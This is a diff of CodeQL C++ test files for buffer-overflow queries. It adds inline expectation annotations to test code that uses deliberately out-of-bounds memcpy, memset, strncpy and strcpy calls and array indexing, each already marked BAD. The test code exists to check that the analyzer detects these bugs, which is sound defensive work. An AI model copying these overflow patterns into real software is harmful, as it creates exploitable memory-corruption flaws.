b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverrunWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/OverrunWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/OverrunWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverrunWriteFloat.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverrunWriteFloat.qlref index 757d1592e830..ba8f6a96a1fd 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverrunWriteFloat.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverrunWriteFloat.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/OverrunWriteFloat.ql \ No newline at end of file +query: Security/CWE/CWE-120/OverrunWriteFloat.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/StrncpyFlippedArgs.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/StrncpyFlippedArgs.qlref index bf0bf1ea7d05..3a2ef158d3d6 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/StrncpyFlippedArgs.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/StrncpyFlippedArgs.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/StrncpyFlippedArgs.ql \ No newline at end of file +query: Likely Bugs/Memory Management/StrncpyFlippedArgs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.expected index 5c10f6e059d1..af3fa1ab7cf6 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.expected @@ -1,3 +1,6 @@ +#select +| tests.cpp:636:2:636:7 | call to strcpy | main.cpp:6:27:6:30 | **argv | tests.cpp:636:17:636:22 | *source | This 'call to strcpy' with input from $@ may overflow the destination. | main.cpp:6:27:6:30 | **argv | a command-line argument | +| tests.cpp:649:2:649:7 | call to strcpy | main.cpp:6:27:6:30 | **argv | tests.cpp:649:14:649:19 | *home | This 'call to strcpy' with input from $@ may overflow the destination. | main.cpp:6:27:6:30 | **argv | a command-line argument | edges | main.cpp:6:27:6:30 | **argv | main.cpp:7:33:7:36 | **argv | provenance | | | main.cpp:6:27:6:30 | **argv | main.cpp:8:34:8:37 | **argv | provenance | | @@ -96,6 +99,3 @@ subpaths | main.cpp:8:34:8:37 | *argv | test_buffer_overrun.cpp:32:46:32:49 | *argv | test_buffer_overrun.cpp:32:46:32:49 | *argv | main.cpp:8:34:8:37 | test_buffer_overrun_main output argument | | main.cpp:9:29:9:32 | **argv | tests_restrict.c:15:41:15:44 | **argv | tests_restrict.c:15:41:15:44 | **argv | main.cpp:9:29:9:32 | tests_restrict_main output argument | | main.cpp:9:29:9:32 | *argv | tests_restrict.c:15:41:15:44 | *argv | tests_restrict.c:15:41:15:44 | *argv | main.cpp:9:29:9:32 | tests_restrict_main output argument | -#select -| tests.cpp:636:2:636:7 | call to strcpy | main.cpp:6:27:6:30 | **argv | tests.cpp:636:17:636:22 | *source | This 'call to strcpy' with input from $@ may overflow the destination. | main.cpp:6:27:6:30 | **argv | a command-line argument | -| tests.cpp:649:2:649:7 | call to strcpy | main.cpp:6:27:6:30 | **argv | tests.cpp:649:14:649:19 | *home | This 'call to strcpy' with input from $@ may overflow the destination. | main.cpp:6:27:6:30 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.qlref index 767f2ea4db9d..36c47957d339 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/UnboundedWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/UnboundedWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/VeryLikelyOverrunWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/VeryLikelyOverrunWrite.qlref index 94b53951c4b7..8dcc2f70c2f6 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/VeryLikelyOverrunWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/VeryLikelyOverrunWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/VeryLikelyOverrunWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/VeryLikelyOverrunWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/main.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/main.cpp index 78f94af22cfe..6f04206359cf 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/main.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/main.cpp @@ -3,7 +3,7 @@ int test_buffer_overrun_main(int argc, char **argv); int tests_restrict_main(int argc, char **argv); int tests_main(int argc, char **argv); -int main(int argc, char **argv) { +int main(int argc, char **argv) { // $ Source[cpp/overflow-destination] Source[cpp/unbounded-write] overflowdesination_main(argc, argv); test_buffer_overrun_main(argc, argv); tests_restrict_main(argc, argv); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/overflowdestination.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/overflowdestination.cpp index 8b785b5a6620..5aa229610bce 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/overflowdestination.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/overflowdestination.cpp @@ -27,7 +27,7 @@ int overflowdesination_main(int argc, char* argv[]) { arg1 = argv[1]; //wrong: only uses the size of the source (argv[1]) when using strncpy - strncpy(param, arg1, strlen(arg1)); + strncpy(param, arg1, strlen(arg1)); // $ Alert[cpp/bad-strncpy-size] Alert[cpp/overflow-destination] //correct: uses the size of the destination array as well strncpy(param, arg1, min(strlen(arg1), sizeof(param) -1)); @@ -40,17 +40,17 @@ void overflowdest_test1(FILE *f) char dest[64]; char src[128]; - fgets(src, 128, f); // GOOD (taints `src`) + fgets(src, 128, f); // GOOD (taints `src`) // $ Source[cpp/overflow-destination] memcpy(dest, src, sizeof(dest)); // GOOD - memcpy(dest, src, sizeof(src)); // BAD: size derived from the source buffer + memcpy(dest, src, sizeof(src)); // BAD: size derived from the source buffer // $ Alert[cpp/overflow-buffer] Alert[cpp/overflow-destination] Alert[cpp/static-buffer-overflow] memcpy(dest, dest, sizeof(dest)); // GOOD } void overflowdest_test2(FILE *f, char *dest, char *src) { memcpy(dest, src, strlen(dest) + 1); // GOOD - memcpy(dest, src, strlen(src) + 1); // BAD: size derived from the source buffer + memcpy(dest, src, strlen(src) + 1); // BAD: size derived from the source buffer // $ Alert[cpp/overflow-destination] memcpy(dest, dest, strlen(dest) + 1); // GOOD } @@ -61,7 +61,7 @@ void overflowdest_test3(FILE *f, char *dest, char *src) char *src3 = src; memcpy(dest2, src2, strlen(dest2) + 1); // GOOD - memcpy(dest2, src2, strlen(src2) + 1); // BAD: size derived from the source buffer + memcpy(dest2, src2, strlen(src2) + 1); // BAD: size derived from the source buffer // $ Alert[cpp/overflow-destination] memcpy(dest2, dest2, strlen(dest2) + 1); // GOOD } @@ -70,7 +70,7 @@ void overflowdest_test23_caller(FILE *f) char dest[64]; char src[128]; - fgets(src, 128, f); // GOOD (taints `src`) + fgets(src, 128, f); // GOOD (taints `src`) // $ Source[cpp/overflow-destination] overflowdest_test2(f, dest, src); overflowdest_test3(f, dest, src); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/tests.cpp index 603d868258a9..60e26aca37fe 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/tests.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/tests.cpp @@ -20,9 +20,9 @@ void test1() char bigbuffer[20]; memcpy(bigbuffer, smallbuffer, sizeof(smallbuffer)); // GOOD - memcpy(bigbuffer, smallbuffer, sizeof(bigbuffer)); // BAD: over-read + memcpy(bigbuffer, smallbuffer, sizeof(bigbuffer)); // BAD: over-read // $ Alert[cpp/overflow-buffer] memcpy(smallbuffer, bigbuffer, sizeof(smallbuffer)); // GOOD - memcpy(smallbuffer, bigbuffer, sizeof(bigbuffer)); // BAD: over-write + memcpy(smallbuffer, bigbuffer, sizeof(bigbuffer)); // BAD: over-write // $ Alert[cpp/overflow-buffer] Alert[cpp/static-buffer-overflow] } void test2() @@ -31,9 +31,9 @@ void test2() char *bigbuffer = (char *)malloc(sizeof(char) * 20); memcpy(bigbuffer, smallbuffer, sizeof(char) * 10); // GOOD - memcpy(bigbuffer, smallbuffer, sizeof(char) * 20); // BAD: over-read + memcpy(bigbuffer, smallbuffer, sizeof(char) * 20); // BAD: over-read // $ Alert[cpp/overflow-buffer] memcpy(smallbuffer, bigbuffer, sizeof(char) * 10); // GOOD - memcpy(smallbuffer, bigbuffer, sizeof(char) * 20); // BAD: over-write + memcpy(smallbuffer, bigbuffer, sizeof(char) * 20); // BAD: over-write // $ Alert[cpp/overflow-buffer] free(bigbuffer); free(smallbuffer); @@ -47,9 +47,9 @@ void test3() bigbuffer = new char[20]; memcpy(bigbuffer, smallbuffer, sizeof(char[10])); // GOOD - memcpy(bigbuffer, smallbuffer, sizeof(char[20])); // BAD: over-read + memcpy(bigbuffer, smallbuffer, sizeof(char[20])); // BAD: over-read // $ Alert[cpp/overflow-buffer] memcpy(smallbuffer, bigbuffer, sizeof(char[10])); // GOOD - memcpy(smallbuffer, bigbuffer, sizeof(char[20])); // BAD: over-write + memcpy(smallbuffer, bigbuffer, sizeof(char[20])); // BAD: over-write // $ Alert[cpp/overflow-buffer] delete [] bigbuffer; delete [] smallbuffer; @@ -160,8 +160,8 @@ void test6(bool cond) for (k = 0; k <= 100; k++) { - buffer[k] = 'x'; // BAD: over-write - ch = buffer[k]; // BAD: over-read + buffer[k] = 'x'; // BAD: over-write // $ Alert[cpp/static-buffer-overflow] + ch = buffer[k]; // BAD: over-read // $ Alert[cpp/static-buffer-overflow] } } @@ -169,11 +169,11 @@ void test7() { char *names[] = {"tom", "dick", "harry"}; - printf("name: %s\n", names[-1]); // BAD: under-read + printf("name: %s\n", names[-1]); // BAD: under-read // $ Alert[cpp/overflow-buffer] printf("name: %s\n", names[0]); // GOOD printf("name: %s\n", names[1]); // GOOD printf("name: %s\n", names[2]); // GOOD - printf("name: %s\n", names[3]); // BAD: over-read + printf("name: %s\n", names[3]); // BAD: over-read // $ Alert[cpp/overflow-buffer] } void test8(int unbounded) @@ -219,16 +219,16 @@ void test9(int param) buffer4 = buffer3; memset(buffer1, 0, 32); // GOOD - memset(buffer1, 0, 33); // BAD: overrun write of buffer1 + memset(buffer1, 0, 33); // BAD: overrun write of buffer1 // $ Alert[cpp/overflow-buffer] memset(buffer2, 0, 32); // GOOD - memset(buffer2, 0, 33); // BAD: overrun write of buffer2 + memset(buffer2, 0, 33); // BAD: overrun write of buffer2 // $ Alert[cpp/overflow-buffer] memset(buffer3, 0, 32); // GOOD - memset(buffer3, 0, 33); // BAD: overrun write of buffer3 + memset(buffer3, 0, 33); // BAD: overrun write of buffer3 // $ Alert[cpp/overflow-buffer] memset(buffer4, 0, 32); // GOOD - memset(buffer4, 0, 33); // BAD: overrun write of buffer4 (buffer3) + memset(buffer4, 0, 33); // BAD: overrun write of buffer4 (buffer3) // $ Alert[cpp/overflow-buffer] memcmp(buffer1, buffer2, 32); // GOOD - memcmp(buffer1, buffer2, 33); // BAD: overrun read of buffer1, buffer2 + memcmp(buffer1, buffer2, 33); // BAD: overrun read of buffer1, buffer2 // $ Alert[cpp/overflow-buffer] } { @@ -236,13 +236,13 @@ void test9(int param) char *str2 = "abcdefgh"; strncpy(str1, str2, strlen(str1) + 1); // GOOD - strncpy(str1, str2, strlen(str2) + 1); // BAD: overrun write of str1 - strncpy(str2, str1, strlen(str1) + 1); // DUBIOUS (detected) + strncpy(str1, str2, strlen(str2) + 1); // BAD: overrun write of str1 // $ Alert[cpp/bad-strncpy-size] + strncpy(str2, str1, strlen(str1) + 1); // DUBIOUS (detected) // $ Alert[cpp/bad-strncpy-size] strncpy(str2, str1, strlen(str2) + 1); // BAD: overrun read of str1 [NOT REPORTED] } - memmove(global_array_6, global_array_5, 6); // BAD: overrun read of global_array_5 - memmove(global_array_5, global_array_6, 6); // BAD: overrun write of global_array_5 + memmove(global_array_6, global_array_5, 6); // BAD: overrun read of global_array_5 // $ Alert[cpp/overflow-buffer] + memmove(global_array_5, global_array_6, 6); // BAD: overrun write of global_array_5 // $ Alert[cpp/overflow-buffer] Alert[cpp/static-buffer-overflow] if (param > 0) { @@ -262,8 +262,8 @@ void test10() wmemset(buffer1, 0, 32); // GOOD - wmemset(buffer1, 0, 33); // BAD: overrun write of buffer1 - wmemset((wchar_t *)buffer2, 0, 32); // BAD: overrun write of buffer2 + wmemset(buffer1, 0, 33); // BAD: overrun write of buffer1 // $ Alert[cpp/overflow-buffer] + wmemset((wchar_t *)buffer2, 0, 32); // BAD: overrun write of buffer2 // $ Alert[cpp/overflow-buffer] } void test11() @@ -272,7 +272,7 @@ void test11() char *string = "Hello, world!"; memset(string, 0, 14); // GOOD - memset(string, 0, 15); // BAD: overrun write of string + memset(string, 0, 15); // BAD: overrun write of string // $ Alert[cpp/overflow-buffer] } { @@ -282,14 +282,14 @@ void test11() buffer = new char[64]; - memset(buffer, 0, 128); // BAD: overrun write of buffer + memset(buffer, 0, 128); // BAD: overrun write of buffer // $ Alert[cpp/overflow-buffer] } { char array[10] = "123"; memset(array, 0, 10); // GOOD - memset(array, 0, 11); // BAD: overrun write of array + memset(array, 0, 11); // BAD: overrun write of array // $ Alert[cpp/overflow-buffer] } } @@ -307,11 +307,11 @@ void test12() dbuf = new char[16]; memset(&myVar, 0, sizeof(myVar)); // GOOD - memset(&myVar, 0, sizeof(myVar) + 1); // BAD: overrun write of myVar + memset(&myVar, 0, sizeof(myVar) + 1); // BAD: overrun write of myVar // $ Alert[cpp/overflow-buffer] memset(myVar.buffer, 0, 16); // GOOD memset(myVar.buffer, 0, 17); // DUBIOUS: overrun write of myVar.buffer, but not out of myVar itself [NOT DETECTED] memset(&(myVar.field), 0, sizeof(int)); // GOOD - memset(&(myVar.field), 0, sizeof(int) * 2); // BAD: overrun write of myVar.field + memset(&(myVar.field), 0, sizeof(int) * 2); // BAD: overrun write of myVar.field // $ Alert[cpp/overflow-buffer] memset(buf + 8, 0, 8); // GOOD memset(buf + 8, 0, 9); // BAD: overrun write of buf [NOT DETECTED] @@ -345,33 +345,33 @@ void test13(char *argArray) char *ptrArray = charArray; char *ptrArrayOffset = charArray + 1; - charArray[-1] = 1; // BAD: underrun write + charArray[-1] = 1; // BAD: underrun write // $ Alert[cpp/overflow-buffer] charArray[0] = 1; // GOOD charArray[9] = 1; // GOOD - charArray[10] = 1; // BAD: overrun write - charArray[5] = charArray[10]; // BAD: overrun read + charArray[10] = 1; // BAD: overrun write // $ Alert[cpp/overflow-buffer] Alert[cpp/static-buffer-overflow] + charArray[5] = charArray[10]; // BAD: overrun read // $ Alert[cpp/overflow-buffer] Alert[cpp/static-buffer-overflow] - intArray[-1] = 1; // BAD: underrun write + intArray[-1] = 1; // BAD: underrun write // $ Alert[cpp/overflow-buffer] intArray[0] = 1; // GOOD intArray[9] = 1; // GOOD - intArray[10] = 1; // BAD: overrun write - intArray[5] = intArray[10]; // BAD: overrun read + intArray[10] = 1; // BAD: overrun write // $ Alert[cpp/overflow-buffer] + intArray[5] = intArray[10]; // BAD: overrun read // $ Alert[cpp/overflow-buffer] - structArray[-1].field = 1; // BAD: underrun write + structArray[-1].field = 1; // BAD: underrun write // $ Alert[cpp/overflow-buffer] structArray[0].field = 1; // GOOD structArray[9].field = 1; // GOOD - structArray[10].field = 1; // BAD: overrun write - structArray[5].field = structArray[10].field; // BAD: overrun read + structArray[10].field = 1; // BAD: overrun write // $ Alert[cpp/overflow-buffer] + structArray[5].field = structArray[10].field; // BAD: overrun read // $ Alert[cpp/overflow-buffer] charArray[9] = (char)intArray[9]; // GOOD - charArray[9] = (char)intArray[10]; // BAD: overrun read + charArray[9] = (char)intArray[10]; // BAD: overrun read // $ Alert[cpp/overflow-buffer] - ptrArray[-2] = 1; // BAD: underrun write - ptrArray[-1] = 1; // BAD: underrun write + ptrArray[-2] = 1; // BAD: underrun write // $ Alert[cpp/overflow-buffer] + ptrArray[-1] = 1; // BAD: underrun write // $ Alert[cpp/overflow-buffer] ptrArray[0] = 1; // GOOD ptrArray[8] = 1; // GOOD ptrArray[9] = 1; // GOOD - ptrArray[10] = 1; // BAD: overrun write + ptrArray[10] = 1; // BAD: overrun write // $ Alert[cpp/overflow-buffer] ptrArrayOffset[-2] = 1; // BAD: underrun write [NOT DETECTED] ptrArrayOffset[-1] = 1; // GOOD (there is room for this) @@ -391,10 +391,10 @@ void test13(char *argArray) buffer1[0] = 0xFFFF; buffer1[49] = 0xFFFF; - buffer1[50] = 0xFFFF; // BAD: overrun write + buffer1[50] = 0xFFFF; // BAD: overrun write // $ Alert[cpp/overflow-buffer] buffer2[0] = 0xFFFF; buffer2[49] = 0xFFFF; - buffer2[50] = 0xFFFF; // BAD: overrun write + buffer2[50] = 0xFFFF; // BAD: overrun write // $ Alert[cpp/overflow-buffer] } } @@ -464,7 +464,7 @@ void test17(long long *longArray) { int intArray[5]; - ((char *)intArray)[-3] = 0; // BAD: underrun write + ((char *)intArray)[-3] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] } { @@ -472,14 +472,14 @@ void test17(long long *longArray) multi[5][5] = 0; // GOOD - multi[-5][5] = 0; // BAD: underrun write [INCORRECT MESSAGE] + multi[-5][5] = 0; // BAD: underrun write [INCORRECT MESSAGE] // $ Alert[cpp/overflow-buffer] multi[5][-5] = 0; // DUBIOUS: underrun write (this one is still within the bounds of the whole array) - multi[-5][-5] = 0; // BAD: underrun write [INCORRECT MESSAGE] + multi[-5][-5] = 0; // BAD: underrun write [INCORRECT MESSAGE] // $ Alert[cpp/overflow-buffer] multi[0][-5] = 0; // BAD: underrun write [NOT DETECTED] - multi[15][5] = 0; // BAD: overrun write + multi[15][5] = 0; // BAD: overrun write // $ Alert[cpp/overflow-buffer] multi[5][15] = 0; // DUBIOUS: overrun write (this one is still within the bounds of the whole array) - multi[15][15] = 0; // BAD: overrun write + multi[15][15] = 0; // BAD: overrun write // $ Alert[cpp/overflow-buffer] } } @@ -494,22 +494,22 @@ void test18() char *p4 = (char *)malloc(128); char *p5 = (char *)malloc(128); - p1[-1] = 0; // BAD: underrun write - p2[-1] = 0; // BAD: underrun write + p1[-1] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] + p2[-1] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] p2++; p2[-1] = 0; // GOOD - p3[-1] = 0; // BAD + p3[-1] = 0; // BAD // $ Alert[cpp/overflow-buffer] while (*p3 != 0) { p3 = update(p3); } p3[-1] = 0; // GOOD - p4[-1] = 0; // BAD: underrun write + p4[-1] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] p4++; p4[-1] = 0; // GOOD - p5[-1] = 0; // BAD + p5[-1] = 0; // BAD // $ Alert[cpp/overflow-buffer] while (*p5 != 0) { p5 = update(p5); } @@ -537,7 +537,7 @@ void test19(bool b) if (b) { - memset(p1, 0, 20); // BAD + memset(p1, 0, 20); // BAD // $ Alert[cpp/overflow-buffer] memset(p2, 0, 20); // GOOD memset(p3, 0, 20); // GOOD } @@ -559,12 +559,12 @@ void test20() // ... } - if (fread(charBuffer, sizeof(char), 101, fileSource) > 0) // BAD + if (fread(charBuffer, sizeof(char), 101, fileSource) > 0) // BAD // $ Alert[cpp/overflow-buffer] { // ... } - if (fread(charBuffer, sizeof(int), 100, fileSource) > 0) // BAD + if (fread(charBuffer, sizeof(int), 100, fileSource) > 0) // BAD // $ Alert[cpp/overflow-buffer] { // ... } @@ -587,7 +587,7 @@ void test21(bool cond) char *ptr; int i; - if (buffer[-1] == 0) { return; } // BAD: accesses buffer[-1] + if (buffer[-1] == 0) { return; } // BAD: accesses buffer[-1] // $ Alert[cpp/overflow-buffer] ptr = buffer; if (cond) @@ -595,7 +595,7 @@ void test21(bool cond) ptr++; if (ptr[-1] == 0) { return; } // GOOD: accesses buffer[0] } else { - if (ptr[-1] == 0) { return; } // BAD: accesses buffer[-1] + if (ptr[-1] == 0) { return; } // BAD: accesses buffer[-1] // $ Alert[cpp/overflow-buffer] } if (ptr[-1] == 0) { return; } // BAD: accesses buffer[-1] or buffer[0] [NOT DETECTED] @@ -633,7 +633,7 @@ char* strcpy(char *, const char *); void test24(char* source) { char buffer[100]; - strcpy(buffer, source); // BAD + strcpy(buffer, source); // BAD // $ Alert[cpp/unbounded-write] } struct my_struct { @@ -646,7 +646,7 @@ void test25(char* source) { s.home = source; char buf[100]; - strcpy(buf, s.home); // BAD + strcpy(buf, s.home); // BAD // $ Alert[cpp/unbounded-write] } void test26(bool cond) @@ -655,7 +655,7 @@ void test26(bool cond) char *ptr; int i; - if (buffer[-1] == 0) { return; } // BAD: accesses buffer[-1] + if (buffer[-1] == 0) { return; } // BAD: accesses buffer[-1] // $ Alert[cpp/overflow-buffer] ptr = buffer; if (cond) @@ -663,7 +663,7 @@ void test26(bool cond) ptr += 1; if (ptr[-1] == 0) { return; } // GOOD: accesses buffer[0] } else { - if (ptr[-1] == 0) { return; } // BAD: accesses buffer[-1] + if (ptr[-1] == 0) { return; } // BAD: accesses buffer[-1] // $ Alert[cpp/overflow-buffer] } if (ptr[-1] == 0) { return; } // BAD: accesses buffer[-1] or buffer[0] [NOT DETECTED] @@ -726,15 +726,15 @@ struct HasSomeFields { }; void test32() { - memset(&c, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, a)); // BAD + memset(&c, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, a)); // BAD // $ Alert[cpp/overflow-buffer] }; void test33() { - memset(&c, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, b)); // BAD + memset(&c, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, b)); // BAD // $ Alert[cpp/overflow-buffer] }; void test34() { - memset(&b, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, a)); // BAD + memset(&b, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, a)); // BAD // $ Alert[cpp/overflow-buffer] }; void test35() { @@ -745,7 +745,7 @@ struct HasSomeFields { void test36() { HasSomeFields hsf; memset(&hsf.a, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, a)); // GOOD - memset(&hsf.c, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, a)); // BAD + memset(&hsf.c, 0, sizeof(HasSomeFields) - offsetof(HasSomeFields, a)); // BAD // $ Alert[cpp/overflow-buffer] } struct AnonUnionInStruct @@ -771,18 +771,18 @@ struct AnonUnionInStruct memset(&a_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_2)); // GOOD memset(&a_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, d)); // GOOD - memset(&b_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_1)); // BAD + memset(&b_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_1)); // BAD // $ Alert[cpp/overflow-buffer] memset(&b_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_1)); // GOOD memset(&b_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, c_1)); // GOOD - memset(&b_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_2)); // BAD + memset(&b_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_2)); // BAD // $ Alert[cpp/overflow-buffer] memset(&b_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_2)); // GOOD memset(&b_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, d)); // GOOD - memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_1)); // BAD - memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_1)); // BAD + memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_1)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_1)); // BAD // $ Alert[cpp/overflow-buffer] memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, c_1)); // GOOD - memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_2)); // BAD - memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_2)); // GOOD + memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_2)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_2)); // GOOD // $ Alert[cpp/overflow-buffer] memset(&c_1, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, d)); // GOOD memset(&a_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_1)); // GOOD @@ -792,10 +792,10 @@ struct AnonUnionInStruct memset(&a_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_2)); // GOOD memset(&a_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, d)); // GOOD - memset(&b_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_1)); // BAD + memset(&b_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_1)); // BAD // $ Alert[cpp/overflow-buffer] memset(&b_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_1)); // GOOD memset(&b_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, c_1)); // GOOD - memset(&b_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_2)); // BAD + memset(&b_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, a_2)); // BAD // $ Alert[cpp/overflow-buffer] memset(&b_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, b_2)); // GOOD memset(&b_2, 0, sizeof(AnonUnionInStruct) - offsetof(AnonUnionInStruct, d)); // GOOD }; @@ -813,7 +813,7 @@ struct UnionWithoutStruct void test37() { memset(&a, 0, sizeof(UnionWithoutStruct) - offsetof(UnionWithoutStruct, a)); // GOOD memset(&a, 0, sizeof(UnionWithoutStruct) - offsetof(UnionWithoutStruct, b)); // GOOD - memset(&b, 0, sizeof(UnionWithoutStruct) - offsetof(UnionWithoutStruct, a)); // BAD + memset(&b, 0, sizeof(UnionWithoutStruct) - offsetof(UnionWithoutStruct, a)); // BAD // $ Alert[cpp/overflow-buffer] }; }; @@ -840,20 +840,20 @@ struct S2 { memset(&f.inner.a, 0, sizeof(S2) - offsetof(S2, f)); // GOOD memset(&f.inner.a, 0, sizeof(S2) - offsetof(S2, u)); // GOOD - memset(&f.inner.b, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // BAD + memset(&f.inner.b, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // BAD // $ Alert[cpp/overflow-buffer] memset(&f.inner.b, 0, sizeof(S2) - offsetof(ThreeUInts, b)); // GOOD memset(&f.inner.b, 0, sizeof(S2) - offsetof(ThreeUInts, c)); // GOOD - memset(&f.inner.b, 0, sizeof(S2) - offsetof(FourUInts, inner)); // BAD + memset(&f.inner.b, 0, sizeof(S2) - offsetof(FourUInts, inner)); // BAD // $ Alert[cpp/overflow-buffer] memset(&f.inner.b, 0, sizeof(S2) - offsetof(FourUInts, x)); // GOOD - memset(&f.inner.b, 0, sizeof(S2) - offsetof(S2, f)); // BAD + memset(&f.inner.b, 0, sizeof(S2) - offsetof(S2, f)); // BAD // $ Alert[cpp/overflow-buffer] memset(&f.inner.b, 0, sizeof(S2) - offsetof(S2, u)); // GOOD - memset(&f.inner.c, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // BAD - memset(&f.inner.c, 0, sizeof(S2) - offsetof(ThreeUInts, b)); // BAD + memset(&f.inner.c, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&f.inner.c, 0, sizeof(S2) - offsetof(ThreeUInts, b)); // BAD // $ Alert[cpp/overflow-buffer] memset(&f.inner.c, 0, sizeof(S2) - offsetof(ThreeUInts, c)); // GOOD - memset(&f.inner.c, 0, sizeof(S2) - 